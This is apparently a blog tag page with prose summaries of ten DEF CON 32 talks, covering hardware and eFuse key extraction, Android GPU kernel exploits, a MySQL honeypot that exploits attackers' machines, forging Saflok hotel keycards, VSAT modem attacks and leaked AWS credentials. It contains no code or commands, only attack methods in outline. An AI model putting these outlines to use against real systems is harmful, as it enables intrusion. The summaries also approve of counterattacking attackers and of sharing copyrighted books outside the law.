Posts Tagged ‘DefCon32’
[DefCon32] Nano Enigma: Uncovering the Secrets in eFuse Memories
Michal Grygarek and Martin Petr, embedded systems security experts at Accenture in Prague, reveal the vulnerabilities of eFuse-based memories used to store sensitive data like encryption keys. Their presentation explores the process of extracting confidential information from these chips using accessible tools, challenging the assumption that eFuse memories are inherently secure. Michal and Martin’s work underscores the need for enhanced protection mechanisms in embedded systems.
Decoding eFuse Vulnerabilities
Martin opens by explaining the role of eFuse memories in securing encryption keys and debugging interfaces. Traditionally considered robust, these memories are susceptible to physical attacks due to their readable properties. Martin details their journey, starting with chip decapsulation using household items like a wet stone, demonstrating that determined attackers can bypass protections without advanced equipment.
Reverse-Engineering Techniques
Michal delves into their methodology, which involved delayering chips to access eFuse data. Using a Scanning Electron Microscope (SEM) rented from a local university, they read encryption keys, breaking the confidentiality of encrypted flash memory. Their approach, supported by Accenture, highlights the ease of extracting sensitive data, as the physical destruction of the chip was not a barrier to recovering firmware.
Implications for Embedded Security
The duo emphasizes the broader implications, noting that eFuse vulnerabilities threaten devices relying on these memories for security. Martin addresses the misconception that delayering is prohibitively complex, showing that basic tools and minimal resources suffice. Their findings, including a giveaway of decapsulated ESP32 chips, encourage hands-on experimentation to understand these risks.
Strengthening Protection Mechanisms
Concluding, Michal advocates for advanced obfuscation techniques and alternative storage solutions to secure sensitive data. Their work, presented at DEF CON 32, calls for vendors to reassess eFuse reliance and implement robust safeguards. By sharing their techniques, Michal and Martin inspire the cybersecurity community to address these overlooked vulnerabilities in embedded systems.
Links:
[DefCon32] The Way to Android Root: Exploiting Smartphone GPU
Xiling Gong and Eugene Rodionov, security researchers at Google, delve into the vulnerabilities of Qualcomm’s Adreno GPU, a critical component in Android devices. Their presentation uncovers nine exploitable flaws leading to kernel code execution, demonstrating a novel exploit method that bypasses Android’s CFI and W^X mitigations. Xiling and Eugene’s work highlights the risks in GPU drivers and proposes actionable mitigations to enhance mobile security.
Uncovering Adreno GPU Vulnerabilities
Xiling opens by detailing their analysis of the Adreno GPU kernel module, prevalent in Qualcomm-based devices. Their research identified nine vulnerabilities, including race conditions and integer overflows, exploitable from unprivileged apps. These flaws, discovered through meticulous fuzzing, expose the GPU’s complex attack surface, making it a prime target for local privilege escalation.
Novel Exploit Techniques
Eugene describes their innovative exploit method, leveraging GPU features to achieve arbitrary physical memory read/write. By exploiting a race condition, they achieved kernel code execution with 100% success on a fully patched Android device. This technique bypasses Control-flow Integrity (CFI) and Write XOR Execute (W^X) protections, demonstrating the potency of GPU-based attacks and the need for robust defenses.
Challenges in GPU Security
The duo highlights the difficulties in securing GPU drivers, which are accessible to untrusted code and critical for performance. Xiling notes that Android’s reliance on in-process GPU handling, unlike isolated IPC mechanisms, exacerbates risks. Their fuzzing efforts, tailored for concurrent code, revealed the complexity of reproducing and mitigating these vulnerabilities, underscoring the need for advanced testing.
Proposing Robust Mitigations
Concluding, Eugene suggests moving GPU operations to out-of-process handling and adopting memory-safe languages to reduce vulnerabilities. Their work, published via Google’s Android security research portal, calls for vendor action to limit attack surfaces. By sharing their exploit techniques, Xiling and Eugene inspire the community to strengthen mobile security against evolving threats.
Links:
[DefCon32] Atomic Honeypot: A MySQL Honeypot That Drops Shells
Alexander Rubin and Martin Rakhmanov, security engineers at Amazon Web Services’ RDS Red Team, present a groundbreaking MySQL honeypot designed to counterattack malicious actors. Leveraging vulnerabilities CVE-2023-21980 and CVE-2024-21096, their “Atomic Honeypot” exploits attackers’ systems, uncovering new attack vectors. Alexander and Martin demonstrate how this active defense mechanism turns the tables on adversaries targeting database servers.
Designing an Active Defense Honeypot
Alexander introduces the Atomic Honeypot, a high-interaction MySQL server that mimics legitimate databases to attract bots. Unlike passive honeypots, this system exploits vulnerabilities in MySQL’s client programs (CVE-2023-21980) and mysqldump utility (CVE-2024-21096), enabling remote code execution on attackers’ systems. Their approach, detailed at DEF CON 32, uses a chain of three vulnerabilities, including an arbitrary file read, to analyze and counterattack malicious code.
Exploiting Attacker Systems
Martin explains the technical mechanics, focusing on the MySQL protocol’s server-initiated nature, which allows their honeypot to manipulate client connections. By crafting a rogue server, they executed command injections, downloading attackers’ Python scripts designed for brute-forcing passwords and data exfiltration. This enabled Alexander and Martin to study attacker behavior, uncovering two novel MySQL attack vectors.
Ethical and Practical Implications
The duo addresses the ethical considerations of active defense, emphasizing responsible use to avoid collateral damage. Their honeypot, which requires no specialized tools and can be set up with a vulnerable MySQL instance, empowers researchers to replicate their findings. However, Martin notes that Oracle’s recent patches may limit the window for experimentation, urging swift action by the community.
Future of Defensive Security
Concluding, Alexander advocates for integrating active defense into cybersecurity strategies, highlighting the honeypot’s ability to provide actionable intelligence. Their work, supported by AWS, inspires researchers to explore innovative countermeasures, strengthening database security against relentless bot attacks. By sharing their exploit chain, Alexander and Martin pave the way for proactive defense mechanisms.
Links:
[DefCon32] Unsaflok: Hacking Millions of Hotel Locks
Lennert Wouters and Ian Carroll, security researchers from KU Leuven and application security experts, respectively, unveil critical vulnerabilities in dormakaba’s Saflok hotel lock system, affecting three million units worldwide. Their presentation details reverse-engineering efforts that enabled them to forge keycards, exposing flaws in the proprietary encryption and key derivation functions. Lennert and Ian also discuss their responsible disclosure process and offer practical advice for hotel guests to verify lock security.
Uncovering Saflok Vulnerabilities
Lennert begins by explaining the Saflok system’s reliance on MIFARE Classic cards, widely used in Las Vegas’s 150,000 hotel rooms. By reverse-engineering the proprietary key derivation and encryption algorithms, Lennert and Ian crafted two forged keycards from a single guest card, capable of unlocking any room and disabling deadbolts. Their findings reveal systemic weaknesses in a decades-old system never previously scrutinized by researchers.
Exploitation Techniques
Ian details the technical approach, which involved analyzing the Saflok’s software and hardware to bypass its protections. Using a low-privilege guest card, they exploited vulnerabilities to generate master keycards, granting unauthorized access. Their demonstration, inspired by prior work on Onity and Vingcard locks, underscores the ease of compromising unpatched systems, posing risks to guest safety and property security.
Responsible Disclosure and Mitigation
The duo responsibly disclosed their findings to dormakaba in September 2022, leading to mitigation efforts, including the adoption of Ultralight C cards and secure element encoders. Lennert discusses challenges in patching millions of locks, noting that legacy encoders may still support vulnerable MIFARE Classic cards. Their work has prompted dormakaba to enhance system security, though full deployment remains ongoing.
Empowering Guest Safety
Concluding, Ian offers practical guidance for hotel guests to check if their room’s lock is patched, such as verifying card types. Their presentation, lauded by peers like Iceman, calls for continued scrutiny of electronic lock systems. By sharing their methodologies, Lennert and Ian empower the cybersecurity community to strengthen hospitality security against emerging threats.
Links:
[DefCon32] AIxCC Closing Ceremonies
Perry Adams and Andrew Carney, representatives from DARPA and ARPA-H, preside over the closing ceremonies of the AI Cyber Challenge (AIxCC) at DEF CON 32. Their presentation celebrates the innovative efforts of participants who developed AI-driven systems to detect and patch software vulnerabilities, emphasizing the critical role of secure software in safeguarding global infrastructure. Perry and Andrew highlight the competition’s impact, announce finalists, and inspire continued collaboration in cybersecurity.
The Vision of AIxCC
Perry opens by reflecting on the AIxCC’s inception, announced at the previous DEF CON, aiming to harness AI to secure critical infrastructure. With over 12,000 visitors to the AIxCC village, the challenge engaged a diverse community in building systems to identify and fix software flaws. Perry underscores the urgency of this mission, given the pervasive vulnerabilities in software underpinning essential services like power grids and healthcare systems.
Recognizing Team Achievements
Andrew highlights standout teams, such as Team Lacrosse for their memorable patch and Team Atlanta for their innovative SQLite findings. The ceremony acknowledges the creative use of large language models (LLMs) and fuzzing techniques by participants. By sharing lessons learned, teams like Trail of Bits contribute to the broader cybersecurity community, fostering transparency and collective progress in tackling software vulnerabilities.
Impact on Critical Infrastructure
The duo emphasizes the broader implications of AIxCC, noting that insecure software threatens global stability. Perry and Andrew praise competitors for developing systems that autonomously detect and mitigate vulnerabilities, reducing reliance on manual processes. Their work aligns with DARPA’s mission to advance technologies that protect national and global infrastructure from cyber threats.
Looking Ahead to Finals
Concluding, Perry announces the finalists, each awarded $2 million and a chance to compete at DEF CON 2025. Andrew encourages ongoing engagement, promising detailed scoring feedback to participants. Their call to action inspires researchers to refine AI-driven security solutions, ensuring a resilient digital ecosystem through collaborative innovation.
Links:
[DefCon32] Breaking the Beam: Exploiting VSAT Modems from Earth
Johannes Willbold, Moritz Schloegel, and Robin Bisping, researchers focused on satellite communications, expose vulnerabilities in VSAT modems, specifically the Newtec MDM2200. Their presentation details reverse-engineering efforts and novel signal injection attacks using software-defined radios (SDRs). By exploiting these systems, Johannes, Moritz, and Robin highlight the expanded attack surface of satellite communications, urging improved security for remote connectivity.
Reverse-Engineering VSAT Modems
Johannes outlines their approach to dissecting the MDM2200’s software stack, uncovering zero-day vulnerabilities. By analyzing firmware, they identified flaws that could allow remote code execution. This meticulous reverse-engineering, part of a broader project published at ACM WiSec 2024, reveals systemic weaknesses in VSAT systems critical for maritime and crisis communications.
Signal Injection Attacks
Moritz details their groundbreaking SDR-based attacks, injecting signals through the modem’s antenna to deliver bogus firmware updates or gain root shell access. Unlike previous VSAT attacks, such as the 2022 ViaSat hack, their method operates entirely from Earth, bypassing traditional network-based exploits. This approach significantly broadens the potential for remote exploitation.
Implications for Satellite Security
Robin discusses the real-world impact, noting that outdated Linux kernels (e.g., version 2.6.3) and latency-sensitive protocols like IPsec exacerbate vulnerabilities. Their end-to-end attack demonstrates the feasibility of compromising satellite modems, potentially disrupting critical communications. The researchers stress the urgency of updating VSAT security practices to protect remote regions.
Call for Robust Defenses
Concluding, Johannes advocates for modernized protocols, such as TLS over IPsec, and regular firmware updates to secure VSAT systems. Their work, soon to be published, invites further research to address these vulnerabilities. By demonstrating practical attacks, Johannes, Moritz, and Robin urge stakeholders to prioritize satellite communication security to safeguard global connectivity.
Links:
- None
[DefCon32] AWS CloudQuarry: Digging for Secrets in Public AMIs
Eduard Agavriloae and Matei Josephs, security researchers from KPMG Romania and Syncubes, present a chilling exploration of vulnerabilities in public Amazon Machine Images (AMIs). Their project, scanning 3.1 million AMIs, uncovered exposed AWS access credentials, posing risks of account takeovers. Eduard and Matei share their methodologies and advocate for robust cloud security practices to mitigate these threats.
Uncovering Secrets in Public AMIs
Eduard opens by detailing their CloudQuarry project, which scanned millions of public AMIs using tools like ScoutSuite. They discovered critical findings, such as exposed access keys, that could enable attackers to compromise AWS accounts. Supported by KPMG Romania, Eduard and Matei’s research highlights the pervasive issue of misconfigured cloud resources, a problem they believe will persist due to human error.
Methodologies and Tools
Matei explains their approach, leveraging automated tools to identify public AMIs and extract sensitive data. Their analysis revealed credentials embedded in AMIs, often overlooked by organizations. By responsibly disclosing findings to affected parties, Eduard and Matei avoided exploiting these keys, demonstrating ethical restraint while highlighting the potential for malicious actors to cause widespread damage.
Risks of Account Takeover
The duo delves into the consequences of exposed credentials, which could lead to unauthorized access, data breaches, or ransomware attacks. Their findings, shared with companies expecting only T-shirts in return, underscore the ease of exploiting public AMIs. Eduard emphasizes the adrenaline rush of discovering such vulnerabilities, reflecting the stakes in cloud security.
Strengthening Cloud Security
Concluding, Matei advocates for enhanced configuration reviews and automated monitoring to prevent AMI exposures. Their collaborative approach, inviting community feedback, reinforces the importance of collective vigilance in securing cloud environments. By sharing their tools and lessons, Eduard and Matei empower organizations to fortify their AWS deployments against emerging threats.
Links:
[DefCon32] DEF CON Unplugged: Cocktails & Cyber with Jeff & Jen
Jen Easterly, Director of CISA, and Jeff Moss, founder of DEF CON, engage in a candid “Ask Me Anything” session, blending mixology with cybersecurity insights. Their informal dialogue, set against Jen’s cocktail-making, addresses pressing issues like cyber liability and secure software development. As members of CISA’s advisory council, Jen and Jeff offer a unique perspective on fostering a secure digital ecosystem through collaboration and accountability.
Navigating Cyber Liability
Jen and Jeff tackle a question on cyber liability, acknowledging its complexity due to legal frameworks focusing on proximate causes, like human errors in ransomware attacks, rather than root issues. Jen emphasizes the need for a cultural shift toward security, referencing CISA’s Cyber Safety Review Board report, which highlights vendor accountability. Their discussion underscores the challenge of legislating liability without a major incident driving change.
Building a Secure Ecosystem
The duo explores levers for enhancing cybersecurity, such as fostering a culture of responsibility among software vendors. Jen highlights the importance of product differentiation through secure development practices, while Jeff stresses the role of community engagement in shaping policy. Their dialogue, enriched by real-world examples, advocates for proactive measures to prevent devastating cyberattacks.
Community Engagement and Collaboration
Reflecting on DEF CON’s role, Jen shares her enthusiasm for the conference as a hub for hacker innovation. She and Jeff emphasize the value of open dialogue, as seen in their AMA format, to bridge gaps between government and the hacker community. By encouraging questions, they foster a collaborative environment where ideas can shape future cybersecurity strategies.
Future Directions for Cybersecurity
Concluding, Jen and Jeff call for sustained efforts to protect critical capabilities from malicious actors, including nation-states and criminals. Their session, blending humor with policy insights, inspires attendees to contribute to a more secure digital landscape through shared responsibility and innovative thinking.
Links:
[DefCon32] Secret Life of Rogue Device: Lost IT Assets on the Public Marketplace
Matthew Bryant, a seasoned security researcher and red team leader at Snap, unveils a startling investigation into the underground market for rogue IT assets. His presentation explores how sensitive devices—employee laptops, hardware prototypes, and even classified government systems—end up on public marketplaces. Through innovative techniques like scraping millions of online listings and reverse-engineering obfuscated apps, Matthew reveals the scale of this issue and its implications for organizational security.
The Scope of Rogue Devices
Matthew begins by defining rogue devices as assets that should never be resold, such as corporate laptops or early-stage hardware prototypes. His research, conducted with support from Snap and inspired by collaborator Apple Demo’s YouTube work on iPhone prototypes, involved analyzing over 150 million images from Western and Eastern secondhand markets. Matthew’s findings expose a thriving trade in sensitive equipment, often originating from e-waste recycling centers or lax supply chain controls.
Technical Challenges and Innovations
To uncover these devices, Matthew employed creative methodologies, including an OCR cluster built from repurposed iPhones to process listing images. He also reverse-engineered Chinese marketplace apps, navigating their obfuscation to extract data. These efforts revealed employee laptops with sensitive data, prototype iPhones, and even government servers on platforms like eBay. Matthew’s approach highlights the ingenuity required to track assets across global, often opaque, marketplaces.
Supply Chain and E-Waste Vulnerabilities
Delving deeper, Matthew identifies supply chain leaks and e-waste mismanagement as primary sources of rogue devices. Companies assume discarded hardware is destroyed, but recyclers often resell functional equipment, such as “50 good iPhones,” for profit. This creates opportunities for attackers to acquire sensitive assets. Matthew stresses the need for organizations to enforce strict destruction protocols and monitor secondary markets to prevent leaks.
Strengthening Organizational Defenses
Concluding, Matthew urges companies to trace their assets’ lifecycle rigorously, from procurement to disposal. By identifying leak sources through marketplace analysis, organizations can close vulnerabilities. His work, enriched by collaborations with underground collector communities, underscores the importance of proactive monitoring and robust supply chain security to safeguard sensitive data and hardware.
Links:
[DefCon32] A Shadow Librarian: Fighting Back Against Encroaching Capitalism
Daniel Messe, a seasoned librarian, delivers a passionate call to action against the corporatization of public libraries. Facing challenges like book bans, inflated eBook prices, and restricted access to academic research, Daniel shares his journey as a “shadow librarian,” using quasi-legal methods to ensure equitable access to knowledge. His talk inspires attendees to join the fight for open information in an era of digital gatekeeping.
The Plight of Public Libraries
Daniel opens by highlighting the existential threats to libraries, including censorship and corporate exploitation. He describes how publishers impose exorbitant eBook licensing fees, rendering digital content unaffordable for libraries. Book bans, particularly targeting marginalized voices, further erode access. Daniel’s narrative underscores the library’s role as a public good, now undermined by profit-driven models.
Shadow Librarianship in Action
Drawing from three decades of library work, Daniel recounts his efforts to bypass restrictive systems. By digitizing out-of-print materials and sharing banned books, he ensures access for underserved communities. His methods, while ethically driven, skirt legal boundaries, reflecting a commitment to serving patrons over corporate interests. Daniel’s stories, including providing banned books to struggling youth, resonate deeply.
Empowering Community Action
Daniel encourages attendees to become shadow librarians, emphasizing that anyone can contribute by sharing knowledge. He advocates for scanning and distributing unavailable materials, challenging unconstitutional bans, and supporting patrons in need. His lack of a formal library degree, yet extensive impact, illustrates that passion and action outweigh credentials in this fight.
Building a Knowledge Commons
Concluding, Daniel envisions a future where communities reclaim access to information. He urges collective resistance against corporate control, drawing parallels to hacker ethics of openness and collaboration. By sharing resources and skills, anyone can become a librarian for their community, ensuring knowledge remains a public right rather than a commodity.
Links:
- None